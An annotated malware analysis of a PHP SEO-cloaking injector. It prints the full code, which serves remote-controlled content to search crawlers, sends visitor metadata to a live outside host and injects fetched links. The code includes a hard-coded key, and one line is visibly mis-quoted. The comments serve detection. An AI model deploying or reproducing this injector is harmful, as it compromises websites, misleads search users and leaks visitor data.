// ANALYSIS NOTE: top-level dispatcher of a crawler-targeted content injector (SEO cloaking).
// Two branches exist:
//   (1) The URI contains an $_API_PATH keyword AND the request has a crawler User-Agent or a
//       search-engine Referer: request metadata is POSTed to _API_URLS and the reply is echoed
//       into the response.
//   (2) Any other crawler request: anchors fetched from _ILINK_URL are added to the rendered
//       page through an output-buffer callback.
// Requests matching neither branch are left untouched, so a manual check in a normal browser
// session shows nothing unusual. Compare against a fetch that presents a crawler User-Agent.
// Indicators visible here: the three constant names, the remote host and the hard-coded key.
define('_API_URLS', 'https://chat.nationsoul.com/api');
define('_ILINK_URL', 'https://chat.nationsoul.com/i/FNrLEn?keyword=vn');
define('_ACCESSKEY', 'lo3dFdaAEf0ZWrLEetfHE');
// Keyword list matched as plain substrings of the request URI (see is_path_matched). Several
// entries are common words, so legitimate URLs of the host site can match as well.
$_API_PATH = array(
'dell', 'find', 'cart', 'nvidia', 'orders', 'thai', 'client', 'orderid', 'update', 'alert', 'filter', 'apple', 'color',
'amazon', 'meta', 'oracle', 'video', 'livetv', 'docs', 'uptime', 'down', 'action', 'game', 'play', 'sports', 'worldcup', 'final', 'games', 'gaming', 'good', 'sitemap', 'store', 'live'
);
// The whole dispatcher sits in a try block whose catch is empty, so exceptions are swallowed
// without any log entry.
try {
// All three inputs below are client-controlled request values.
$path = !empty($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : (isset($_SERVER['HTTP_X_REWRITE_URL']) ? $_SERVER['HTTP_X_REWRITE_URL'] : '/');
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (is_path_matched($path, $_API_PATH) && (is_spider($ua) || is_search_engine_ref($ref))) {
// Hides errors, lifts the execution time limit and keeps running after the client disconnects.
// Every call is @-suppressed so failures leave no trace in the error log.
// NOTE(review): allow_url_fopen is a system-level ini setting, so this ini_set call is not
// expected to change it at runtime - confirm against the PHP version in use.
@ini_set('display_errors', 'Off');
@error_reporting(E_ALL ^ E_NOTICE);
@set_time_limit(0);
@ini_set('allow_url_fopen', 'On');
@ignore_user_abort(true);
$protocol = getProtocol();
// Host is taken from X-Forwarded-Host first, a header the client can set.
$host = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
$domain = $protocol . '://' . $host;
// Any sitemap.xml request (in path or query string) is normalised to one fixed path value.
if (strpos($path, 'sitemap.xml') !== false || (isset($_SERVER['QUERY_STRING']) && strpos($_SERVER['QUERY_STRING'], 'sitemap.xml') !== false)) {
$path = '?sitemap.xml';
}
// Field names and values are both base64-encoded before being form-encoded. In egress logs or
// proxy captures the field names therefore appear as the base64 of domain, path, spider,
// referer, ipaddr and keyword (for example ZG9tYWlu for domain, aXBhZGRy for ipaddr), which
// gives a stable network signature for outbound POST bodies.
$params = array(
base64_encode('domain') => base64_encode($domain),
base64_encode('path') => base64_encode($path),
base64_encode('spider') => base64_encode($ua),
base64_encode('referer') => base64_encode($ref),
base64_encode('ipaddr') => base64_encode(getIP()),
);
// Keyword comes from the URL path first, then from the first non-empty query parameter that is
// named after an $_API_PATH entry.
$kw = extractKeywordFromPath($path, $_API_PATH);
if ($kw === '') {
foreach ($_API_PATH as $p) {
if (isset($_GET[$p]) && $_GET[$p] !== '') {
$kw = $_GET[$p];
break;
}
}
}
if ($kw !== '') {
$params[base64_encode('keyword')] = base64_encode($kw);
}
// The nonstandard header name user_agent: (underscore, no space after the colon) is another
// matchable trait of the outbound request.
$headers = array('Content-Type: application/x-www-form-urlencoded', 'user_agent:' . $ua);
if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
$headers[] = 'Accept-Language: ' . $_SERVER['HTTP_ACCEPT_LANGUAGE'];
}
// The remote reply is written straight into the HTTP response, so the remote operator decides
// what is served under the site's domain. No exit follows in this listing, so whatever the host
// file does next still runs after the injected output.
$resp = http_post(build_api_url(_API_URLS), $params, $headers);
echo can_decrypt() ? decrypt_psk_response($resp) : $resp;
// Crawler-only branch for URIs that did not take the branch above.
} elseif (is_spider($ua)) {
$raw = http_get(_ILINK_URL);
// The callback receives the fully rendered page. It extracts every anchor element from the
// fetched document, wraps each one in a list item stamped with the current date, and inserts the
// list before the closing body tag, or prepends it when the page has none. If the fetch returned
// nothing or no anchors are found, the page is returned unchanged.
ob_start(function ($buffer) use ($raw) {
if (empty($raw)) return $buffer;
if (!preg_match_all('/<a\s[^>]*>.*?<\/a>/is', $raw, $m) || empty($m[0])) return $buffer;
$today = date('Y-m-d');
$items = '';
// NOTE(review): the string quoting on the following lines is inconsistent as rendered on this
// page (escaping was probably lost in extraction), so the listing does not parse as shown.
// Treat it as a reference copy for analysis, not as a byte-exact sample for hashing.
foreach ($m[0] as $a) {
$items .= '<li>' . $a . '<span class="date">' . $today . '</span></li>\n";
}
$inject = "\n<style>ul.list_news{list-style:none;padding:0;}ul.list_news li{margin-bottom:4px;}ul.list_news .date{color:gray;margin-left:10px;font-size:0.9em;}</style>\n<ul class="list_news">\n" . $items . "</ul>\n";
if (stripos($buffer, '</body>') !== false) {
return str_ireplace('</body>', $inject . '</body>', $buffer);
}
return $inject . "\n" . $buffer;
});
}
} catch (Exception $e) {
}
// Capability probe: reports whether the host PHP build can handle the encrypted response mode.
// Requires openssl_decrypt, hash_hmac and the OPENSSL_RAW_DATA constant, then runs one trial
// AES-256-CBC encryption with a throwaway key and IV. The result is cached in a static, so the
// probe runs once per request. Returns bool.
function can_decrypt()
{
static $ok = null;
if ($ok !== null) return $ok;
if (!function_exists('openssl_decrypt') || !function_exists('hash_hmac') || !defined('OPENSSL_RAW_DATA')) {
$ok = false;
return false;
}
// Trial call only; the key and IV here are filler values, not the real key material.
$test = @openssl_encrypt('test', 'aes-256-cbc', str_repeat('k', 32), OPENSSL_RAW_DATA, str_repeat('i', 16));
$ok = ($test !== false);
return $ok;
}
// Capability probe: returns true when gzdecode is available, cached in a static after the
// first call. build_api_url uses it to advertise gzip support to the remote endpoint.
function can_gzdecode()
{
static $ok = null;
if ($ok !== null) return $ok;
$ok = function_exists('gzdecode');
return $ok;
}
// Appends capability flags to the endpoint URL: enc=psk when can_decrypt() is true and gz=1
// when can_gzdecode() is true. Returns $base unchanged when neither applies.
// Detection: outbound requests from the web server whose query string carries these flags
// (most commonly both, joined by an ampersand) are a usable egress or proxy-log signature.
function build_api_url($base)
{
$qs = array();
if (can_decrypt()) $qs[] = 'enc=psk';
if (can_gzdecode()) $qs[] = 'gz=1';
return !empty($qs) ? $base . '?' . implode('&', $qs) : $base;
}
// Sends $data as a form-encoded POST to $url and returns the response body, or an empty string
// on failure. Uses curl when available, otherwise a stream context with file_get_contents.
// The visitor's own User-Agent and Referer are replayed on the outbound request.
// Security-relevant points for responders:
//   - TLS certificate and host-name verification are disabled on both code paths, so the
//     transport does not authenticate the remote endpoint.
//   - Failures are silent: curl errors map to an empty string and the fallback is @-suppressed.
//   - Timeouts differ by path (60 seconds with curl, 30 with the stream fallback), which can
//     show up as slow responses to crawler requests on an affected site.
function http_post($url, $data, $headers = array())
{
$body = http_build_query($data);
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $body,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 60,
CURLOPT_ENCODING => 'gzip, deflate',
// Certificate chain and host-name checks are both switched off.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_USERAGENT => $ua,
CURLOPT_REFERER => $ref,
));
$resp = curl_exec($ch);
curl_close($ch);
return ($resp !== false) ? $resp : '';
}
// Fallback when the curl extension is missing; depends on URL-capable stream wrappers.
$ctx = stream_context_create(array(
'http' => array(
'method' => 'POST',
'header' => implode("\r\n", $headers) . "\r\nUser-Agent: " . $ua . "\r\nReferer: " . $ref,
'content' => $body,
'timeout' => 30,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
),
));
$resp = @file_get_contents($url, false, $ctx);
return ($resp !== false) ? $resp : '';
}
// Fetches $url with a 5 second timeout and returns the trimmed body, or an empty string.
// The visitor's User-Agent is replayed on the outbound request. TLS verification is disabled
// on both code paths. The curl path accepts only HTTP 200 with a non-empty body; the stream
// fallback has no explicit status check and returns whatever file_get_contents yields.
function http_get($url)
{
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt_array($ch, array(
CURLOPT_URL => $url,
CURLOPT_TIMEOUT => 5,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_ENCODING => 'gzip, deflate',
// Certificate chain and host-name checks are both switched off.
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_USERAGENT => $ua,
));
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($code == 200 && !empty($resp)) ? trim($resp) : '';
}
// Fallback when the curl extension is missing.
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 5,
'user_agent' => $ua,
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false,
),
));
$resp = @file_get_contents($url, false, $ctx);
return ($resp !== false) ? trim($resp) : '';
}
// Returns true when the lowercased User-Agent contains any of six search-engine tokens.
// The test is a plain substring match on a client-supplied header, with no reverse-DNS or
// IP-range validation of the crawler. For responders this means the cloaked output can be
// reproduced during verification by fetching the page with a crawler-style User-Agent.
function is_spider($ua)
{
if (!$ua) return false;
$ua = strtolower($ua);
foreach (array('googlebot', 'bingbot', 'yandex', 'google', 'bing', 'yahoo') as $kw) {
if (strpos($ua, $kw) !== false) return true;
}
return false;
}
// Returns true when the lowercased Referer contains any of six search-engine host fragments.
// Substring match on a client-supplied header: the fragment may appear anywhere in the value,
// not only in the host part, so this selects visitors who clicked through from search results.
function is_search_engine_ref($ref)
{
if (!$ref) return false;
$ref = strtolower($ref);
foreach (array('google.', 'bing.', 'yahoo.', 'yandex.', 'duckduckgo.', 'ampproject.') as $eng) {
if (strpos($ref, $eng) !== false) return true;
}
return false;
}
// Returns true when the lowercased request URI matches any entry of $list.
// An entry longer than two characters that starts and ends with a slash is treated as a regular
// expression (case-insensitive); every entry is also tried as a plain substring. The match runs
// over the whole URI string passed in, so a keyword in the query string counts as well.
// None of the entries listed on this page use the slash-delimited regex form.
function is_path_matched($uri, $list)
{
if (!is_string($uri) || $uri === '') return false;
$uri = strtolower($uri);
foreach ($list as $kw) {
$kw = trim($kw);
if ($kw === '') continue;
if (strlen($kw) > 2 && $kw[0] === '/' && substr($kw, -1) === '/') {
// Errors from a malformed pattern are suppressed.
if (@preg_match($kw . 'i', $uri)) return true;
}
if (strpos($uri, strtolower($kw)) !== false) return true;
}
return false;
}
// Derives the keyword sent to the remote endpoint from the request path.
// Steps: take the path component of the URI, strip the directory of the running script when the
// path starts with it, split on slashes, then return the URL-decoded second segment when the
// first segment is one of $prefixes, otherwise the URL-decoded first segment.
// Returns an empty string when the path cannot be parsed or has no segments.
// The value is attacker-influenced input from the URL and is forwarded as-is (base64-encoded by
// the caller) to the remote endpoint.
function extractKeywordFromPath($requestUri, $prefixes)
{
$uri_path = parse_url($requestUri, PHP_URL_PATH);
if (!$uri_path) return '';
$script_dir = rtrim(str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'])), '/');
if ($script_dir !== '' && strpos($uri_path, $script_dir) === 0) {
$uri_path = substr($uri_path, strlen($script_dir));
}
$segments = explode('/', trim($uri_path, '/'));
if (empty($segments) || (count($segments) === 1 && $segments[0] === '')) return '';
// Loose (non-strict) membership test against the keyword list.
if (count($segments) >= 2 && in_array($segments[0], $prefixes)) {
return urldecode($segments[1]);
}
return urldecode($segments[0]);
}
// Picks a visitor address to report to the remote endpoint.
// Checks CF-Connecting-IP, Client-IP, X-Forwarded-For and REMOTE_ADDR in that order (from
// $_SERVER, else the environment) and uses the first value that is set and not the word unknown.
// The first three are request headers a client can set, so the reported value is not reliable.
// The final regex is unanchored and only extracts the first run of 7 to 15 digits and dots; it
// does not validate octets, and an IPv6 address would normally yield an empty string.
function getIP()
{
$ip = '';
foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR') as $k) {
$v = isset($_SERVER[$k]) ? $_SERVER[$k] : getenv($k);
if ($v && strcasecmp($v, 'unknown') !== 0) {
$ip = $v;
break;
}
}
return preg_match('/[\d\.]{7,15}/', $ip, $m) ? $m[0] : '';
}
// Returns the scheme used to build the site URL reported to the remote endpoint.
// Precedence: X-Forwarded-Proto header (client-settable; anything other than https maps to
// http), then the HTTPS server variable, then REQUEST_SCHEME lowercased as-is, then port 443,
// and finally http as the default.
function getProtocol()
{
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO'])) return strtolower($_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https' ? 'https' : 'http';
if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') return 'https';
if (isset($_SERVER['REQUEST_SCHEME'])) return strtolower($_SERVER['REQUEST_SCHEME']);
if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443') return 'https';
return 'http';
}
// Compares two strings for equality, delegating to hash_equals when the runtime provides it.
// The fallback rejects on length mismatch, then ORs together the XOR of every byte pair so the
// loop always visits all bytes instead of stopping at the first difference.
// Used by decrypt_psk_response to check the MAC of the remote reply.
function hash_equals_compat($known, $user)
{
if (function_exists('hash_equals')) return hash_equals($known, $user);
if (strlen($known) !== strlen($user)) return false;
$result = 0;
for ($i = 0; $i < strlen($known); $i++) $result |= ord($known[$i]) ^ ord($user[$i]);
return $result === 0;
}
// Derives two 32-byte keys from the pre-shared access key and returns them as
// array(encryption key, MAC key).
// The construction follows the extract-then-expand shape of HKDF with HMAC-SHA256: an extract
// step keyed with a 32-byte all-zero salt, then counter-mode expansion with a fixed info label
// until 64 bytes are produced.
// For responders: the input key is a constant embedded in the file, so anyone holding the
// sample can derive the same keys and decrypt captured replies for analysis. The info label is
// a distinctive fixed string and is suitable for content signatures.
function derive_psk_keys($accessKey)
{
$ikm = $accessKey;
$salt = str_repeat("\x00", 32);
$info = 'seo_control_gin|psk|aes-256-cbc|v1';
// Extract step: the salt is the HMAC key, the access key is the message.
$prk = hash_hmac('sha256', $ikm, $salt, true);
$t = '';
$okm = '';
// Expand step: each round chains the previous block, the info label and a one-byte counter.
for ($i = 1; strlen($okm) < 64; $i++) {
$t = hash_hmac('sha256', $t . $info . chr($i), $prk, true);
$okm .= $t;
}
$keyEnc = substr($okm, 0, 32);
$keyMac = substr($okm, 32, 32);
return array($keyEnc, $keyMac);
}
// Unwraps the encrypted reply of the remote endpoint and returns the plaintext that the caller
// echoes into the page.
// Expected envelope: JSON with v equal to psk1 plus base64 fields iv, ct and tag, and an
// optional gz flag. Processing order: verify HMAC-SHA256 over iv followed by ct, decrypt with
// AES-256-CBC, strip padding, then gunzip when gz is set.
// Return values: the input unchanged when it is not a psk1 envelope (so plaintext replies still
// reach the page), an empty string on MAC or decryption failure, otherwise the plaintext.
// For responders: the envelope keys and the psk1 version marker are matchable in captured
// traffic, and the hard-coded _ACCESSKEY is enough to decrypt such captures offline.
function decrypt_psk_response($resp)
{
$obj = json_decode($resp, true);
if (!is_array($obj) || !isset($obj['v']) || $obj['v'] !== 'psk1') return $resp;
// Presence of iv, ct and tag is not checked before use.
$iv = base64_decode($obj['iv']);
$ct = base64_decode($obj['ct']);
$tag = base64_decode($obj['tag']);
list($keyEnc, $keyMac) = derive_psk_keys(_ACCESSKEY);
// MAC is verified before any decryption is attempted.
$calc = hash_hmac('sha256', $iv . $ct, $keyMac, true);
if (!hash_equals_compat($calc, $tag)) return '';
$pt = openssl_decrypt($ct, 'aes-256-cbc', $keyEnc, OPENSSL_RAW_DATA, $iv);
if ($pt === false) return '';
$len = strlen($pt);
if ($len === 0) return '';
// Manual PKCS#7-style padding check on the decrypted bytes.
// NOTE(review): OPENSSL_ZERO_PADDING is not set above, so openssl_decrypt is expected to have
// removed the padding already; anyone reimplementing this for traffic analysis should confirm
// whether this second pass ever alters real payloads.
$pad = ord($pt[$len - 1]);
if ($pad >= 1 && $pad <= 16 && $pad <= $len) {
$valid = true;
for ($i = $len - $pad; $i < $len; $i++) {
if (ord($pt[$i]) !== $pad) {
$valid = false;
break;
}
}
if ($valid) $pt = substr($pt, 0, $len - $pad);
}
// Optional gzip layer; on decode failure the undecoded bytes are kept.
if (!empty($obj['gz']) && function_exists('gzdecode')) {
$decoded = @gzdecode($pt);
if ($decoded !== false) $pt = $decoded;
}
return $pt;
}